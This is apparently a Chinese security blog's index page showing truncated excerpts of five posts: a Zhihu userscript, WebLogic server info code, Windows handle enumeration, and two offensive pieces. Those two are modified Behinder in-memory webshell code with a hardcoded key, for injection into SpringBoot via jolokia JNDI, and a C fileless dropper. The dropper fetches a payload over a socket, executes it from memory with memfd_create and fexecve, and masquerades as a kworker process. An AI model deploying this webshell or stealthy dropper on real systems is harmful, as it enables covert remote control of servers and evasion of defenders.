博文

油猴脚本之恢复知乎关注专栏功能

图片
     知乎把关注专栏功能给删除了,但是保留了取消关注专栏功能            抓包看了下取消关注:          留意到在这个请求之前有个OPTIONS包,支持PUT,DELETE等方法,推测关注应该就是PUT          尝试PUT发现报错          换其他专栏试试              关注成功,看来是已关注的专栏不能再关注     那么脚本的思路便有了,脚本如下:   // ==UserScript== // @name 知乎关注专栏 // @namespace http://tampermonkey.net/ // @version 0.1 // @description 恢复知乎关注专栏功能 // @author You // @match https://www.zhihu.com/column/* // @require https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js // @grant none // ==/UserScript== //copy from https://gist.githubusercontent.com/raw/2625891/waitForKeyElements.js function waitForKeyElements ( selectorTxt, /* Required: The jQuery selector string that specifies the desired element(s). */ actionFunction, /* Required: The code to run when elements are found. It is passed a jNode to the matched element. */ bWaitOnce, /* Opt

SpringBoot注入冰蝎内存马实践

图片
     本文以SpringBoot的jolokia存在jndi 注入为例讲如何向服务器注入冰蝎内存马,环境来自 SpringBootVulExploit 。     首先给下改造好的冰蝎代码 package com.evil; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import java.lang.reflect.Method; import java.util.HashMap; import java.util.Map; public class Beh{ public void index(final HttpServletRequest req, final HttpServletResponse resp) { try { if (req.getMethod().equals("POST")) { String k = "e45e329feb5d925b"; // rebeyond HttpSession session = req.getSession(); session.putValue("u", k); Cipher c = Cipher.getInstance("AES"); c.init(2, new SecretKeySpec(k.getBytes(), "AES")); final Map myPageContext = new HashMap (); myPageContext.put("

如何编程获得weblogic的servername、ListenAddress 、port、version

参考 get-the-name-of-the-server-in-which-i-am-receiving-requests-to-my-app-on-weblogi try { InitialContext ctx = new InitialContext(); String serverName = System.getProperty("weblogic.Name"); MBeanServer server = (MBeanServer)ctx.lookup("java:comp/env/jmx/runtime"); ObjectName objName = new ObjectName("com.bea:Name=" + serverName + ",Type=ServerRuntime"); Integer port = (Integer)server.getAttribute(objName, "ListenPort"); String ListenAddress = (String)server.getAttribute(objName, "ListenAddress"); String WeblogicVersion = (String)server.getAttribute(objName, "WeblogicVersion"); System.out.println("Server Name : " + serverName + "Listen Address : " + ListenAddress + " PORT : " + port + " WeblogicVersion : " + WeblogicVersion); } catch(Exception e) { // }

枚举进程所有文件句柄

    代码来自 Enumerating opened handles from a process ,改了几个小bug      #ifndef UNICODE #define UNICODE #endif #include "stdafx.h" #include <windows.h> #include <stdio.h> #define NT_SUCCESS(x) ((x) >= 0) #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 #define SystemHandleInformation 16 #define ObjectBasicInformation 0 #define ObjectNameInformation 1 #define ObjectTypeInformation 2 typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef NTSTATUS(NTAPI *_NtDuplicateObject)( HANDLE SourceProcessHandle, HANDLE SourceHandle, HANDLE TargetProcessHandle, PHANDLE TargetHandle, ACCESS_MASK DesiredAccess, ULONG Attributes, ULONG Options ); typedef NTSTATUS(NTAPI *_NtQueryObject)( HANDLE ObjectHandle, ULONG ObjectInformationClass, PVOID ObjectInformation, ULONG ObjectInformationLength, PULONG ReturnLength ); typedef struct _UNICODE_STRING

linux无文件进程注入

本文是对  Super-Stealthy Droppers 的复现,测试发现代码有些bug,在远程利用时会问题,稍作完善了下。 memfd_create + fexecve  memfd_create需要 kernel 3.17以上,fexecve需要2.3.2以上 #include <stdio.h> #include <stdlib.h> #include <sys/syscall.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #define __NR_memfd_create  319 #define MFD_CLOEXEC  1 static   inline  int   memfd_create( const   char   *name, unsigned  int   flags) {      return   syscall(__NR_memfd_create, name, flags); } extern  char          **environ; int   main ( int   argc,  char   **argv) {    int                  fd, s;    unsigned  long        addr =  0x0100007f11110002 ;    char                 *args[ 2 ]= { "[kworker/u!0]" , NULL};    char                 buf[ 1024 ];   int              num;    // Connect    if   ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) <  0 ) exit ( 1 );    if   (connect (s, (struc